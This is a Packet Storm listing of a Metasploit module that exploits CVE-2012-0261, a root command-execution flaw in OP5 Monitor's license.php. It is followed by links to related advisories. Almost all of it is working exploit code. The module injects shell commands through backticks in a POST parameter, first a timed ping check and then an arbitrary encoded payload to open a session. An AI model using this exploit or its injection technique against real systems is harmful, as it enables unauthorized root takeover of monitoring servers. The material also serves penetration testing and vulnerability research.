Lucene search
Peter OsterbergPACKETSTORM:108541HistoryJan 11, 2012 - 12:00 a.m.
OP5 license.php Remote Command Execution
2012-01-1100:00:00
Peter Osterberg
packetstormsecurity.com
28
EPSS
0.838
Percentile
98.5%
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OP5 license.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in the
OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-0261'],
['OSVDB', '78064'],
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => '`\\|',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl ruby',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jan 05 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('URI', [true, "The full URI path to license.php", "/license.php"]),
], self.class)
end
def check
print_status("Attempting to detect if the OP5 Monitor is vulnerable...")
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now
data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install';
res = send_request_cgi({
'uri' => datastore['URI'],
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 25)
elapsed = Time.now - start
if elapsed >= 5
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';
res = send_request_cgi({
'uri' => datastore['URI'],
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 25)
if(not res)
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end
end
end
`
Related
dsquare
dsquare
OP5 Monitor 5.5 license.php RCE
2012-08-10 00:00:00
OP5 Monitor 5.5 RCE
2012-08-10 00:00:00
checkpoint_advisories
checkpoint_advisories
op5 Monitor license.php Remote Command Execution (CVE-2012-0261)
2014-10-02 00:00:00
exploitdb
exploitdb
prion
prion
Deserialization of untrusted data
2013-12-31 20:55:00
zdt
zdt
nessus
nessus
op5 Portal Arbitrary Command Execution
2012-01-17 00:00:00
nvd
nvd
CVE-2012-0261
2013-12-31 20:55:04
d2
d2
DSquare Exploit Pack: D2SEC_OP5
2013-12-31 20:55:00
metasploit
metasploit
OP5 license.php Remote Command Execution
2012-01-07 21:12:49
cvelist
cvelist
CVE-2012-0261
2013-12-31 20:00:00
cve
cve
CVE-2012-0261
2013-12-31 20:55:04
openvas
openvas
op5 Monitor / Appliance < 5.5.3 Multiple RCE Vulnerabilities (Dec 2013)
2012-01-09 00:00:00